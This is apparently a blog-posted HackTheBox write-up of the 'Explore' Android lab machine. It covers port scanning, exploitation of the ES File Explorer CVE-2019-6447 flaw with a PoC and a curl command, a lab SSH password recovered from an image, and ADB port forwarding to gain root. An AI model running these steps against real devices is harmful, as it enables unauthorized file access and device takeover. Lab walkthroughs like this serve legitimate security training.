EXPLORE HACKTHEBOX WRITEUP[DETAILED]

 



OS : Android

Difficulty : Easy


INITIAL SCAN [nmap]

i'am always start with nmap scan,its found only one port so i decide to run full ports Scan

But nmap took lot of time so i ran Rustscan 


Found Four Ports Are Opened

PORT     STATE SERVICE     REASON
2222/tcp  open  EtherNetIP-1   syn-ack
42129/tcp open  unknown      syn-ack
42135/tcp open  unknown      syn-ack
59777/tcp open  unknown      syn-ack

then i ran nmap with -p (smart work)

sudo nmap -sV -sC 10.10.10.247 -p 2222,42129,42135,59777 -oN nmap

 

 PORT   STATE SERVICE VERSION  
 2222/tcp open ssh   (protocol 2.0)  
 | fingerprint-strings:   
 |  NULL:   
 |_  SSH-2.0-SSH Server - Banana Studio  
 | ssh-hostkey:   
 |_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)  
 42129/tcp open unknown  
 | fingerprint-strings:   
 |  GenericLines:   
 |   HTTP/1.0 400 Bad Request  
 |   Date: Sun, 27 Jun 2021 03:07:01 GMT  
 |   Content-Length: 22  
 |   Content-Type: text/plain; charset=US-ASCII  
 |   Connection: Close  
 |   Invalid request line:  
 |  GetRequest:   
 |   HTTP/1.1 412 Precondition Failed  
 |   Date: Sun, 27 Jun 2021 03:07:01 GMT  
 |   Content-Length: 0  
 |  HTTPOptions:   
 |   HTTP/1.0 501 Not Implemented  
 |   Date: Sun, 27 Jun 2021 03:07:06 GMT  
 |   Content-Length: 29  
 |   Content-Type: text/plain; charset=US-ASCII  
 |   Connection: Close  
 |   Method not supported: OPTIONS  
 |  Help:   
 |   HTTP/1.0 400 Bad Request  
 |   Date: Sun, 27 Jun 2021 03:07:23 GMT  
 |   Content-Length: 26  
 |   Content-Type: text/plain; charset=US-ASCII  
 |   Connection: Close  
 |   Invalid request line: HELP  
 |  RTSPRequest:   
 |   HTTP/1.0 400 Bad Request  
 |   Date: Sun, 27 Jun 2021 03:07:06 GMT  
 |   Content-Length: 39  
 |   Content-Type: text/plain; charset=US-ASCII  
 |   Connection: Close  
 |   valid protocol version: RTSP/1.0  
 |  SSLSessionReq:   
 |   HTTP/1.0 400 Bad Request  
 |   Date: Sun, 27 Jun 2021 03:07:23 GMT  
 |   Content-Length: 73  
 |   Content-Type: text/plain; charset=US-ASCII  
 |   Connection: Close  
 |   Invalid request line:   
 |   ?G???,???`~?  
 |   ??{????w????<=?o?  
 |  TLSSessionReq:   
 |   HTTP/1.0 400 Bad Request  
 |   Date: Sun, 27 Jun 2021 03:07:25 GMT  
 |   Content-Length: 71  
 |   Content-Type: text/plain; charset=US-ASCII  
 |   Connection: Close  
 |   Invalid request line:   
 |   ??random1random2random3random4  
 |  TerminalServerCookie:   
 |   HTTP/1.0 400 Bad Request  
 |   Date: Sun, 27 Jun 2021 03:07:25 GMT  
 |   Content-Length: 54  
 |   Content-Type: text/plain; charset=US-ASCII  
 |   Connection: Close  
 |   Invalid request line:   
 |_  Cookie: mstshash=nmap  
 42135/tcp open http  ES File Explorer Name Response httpd  
 |_http-server-header: ES Name Response Server  
 |_http-title: Site doesn't have a title (text/html).  
 59777/tcp open http  Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older  
 |_http-title: Site doesn't have a title (text/plain).  

 

Port 2222 

its a Ssh Sever for this machine(Android) from Banana Studio

A powerful application allows you to run SSH/SFTP Server on your Android device with full functional terminal.

for more 

Then i move to 42129 and 42135 ports,Nothing Interestring but Port 59777

gives something special output yeah its vulnerable to ES File Explorer (CVE-2019–6447)

The ES file browser creates an HTTP service bound to port 59777 at runtime, which provides 10+ commands for accessing data in user’s cell phone and executing the application; however, the service does not check this request. Test, resulting in a security breach.

for more this article gives the full explanation of this vulnerability

Time To Exploit

USER.TEXT

i found a exploit/POC from github..

git clone this then install requirements(pip install -r requirements.txt)

then run

python3 poc.py --cmd getDeviceInfo --ip 10.10.10.247

 python poc.py --cmd listFiles --ip 10.10.10.247

 

or also you can use curl to exploit manually i'm suggest to you use curl coz its clean and good

same out put

so i first start to fuzz with /sdcard

user.txt

Command To Use Curl

 curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://10.10.10.247:59777/sdcard/  

 

USER FLAG

PRIVILEGE ESCALATION

Its android box so you definitely need Android Debug Bridge(ADB) in your system

what is adb?

Android Debug Bridge (ADB) is a development tool that facilitates communication between an Android device and a personal computer 

iam  debian(kali) user i use apt package manager for installation

sudo apt-get install android-tools-adb

 

installation guide(other-distros)


its your first android box then you need to learn something about Android Pentesting so i suggest tryhackme room(free)

Tryhackme here

Okkkkk... its enough detail about basic android pentest

Time to Root

Further enumeration i found creds.jpg 


location :  http://10.10.10.247:59777/sdcard/DCIM/creds.jpg

creds for ssh

We Know PORT 2222 is Ssh Service running(nmap o/p)

and also we have creds so login via ssh 

 

ssh kristi@10.10.10.247 -p 2222

password : Kr1sT!5h@Rp3xPl0r3! 

then i found a another interstring article here

ATACK SENARIO

Android devices Being Shipped with TCP Port 5555 Enabled so we port forward 5555(port) to our localhost then exploit via adb get shell :)

sudo ssh -p 2222 -L 5555:localhost:5555 kristi@explore.htb

 


 

STEPS TO BECAME ROOT 

in adb shell(right-side-of-the-img) run

 su

we are now root

then search root.txt (with super fast openvpn connection) Box is very slow i'm so frustrating to find root.txt

Finally flound that in /data/root.txt


I HOPE YOU UNDERSTAND SOMETHING ABOUT BASIC ANDROID PENTESTING .....





4 تعليقات

إرسال تعليق

أحدث أقدم

Smartphones

Post ADS 1

Advertisement

Post ADS 1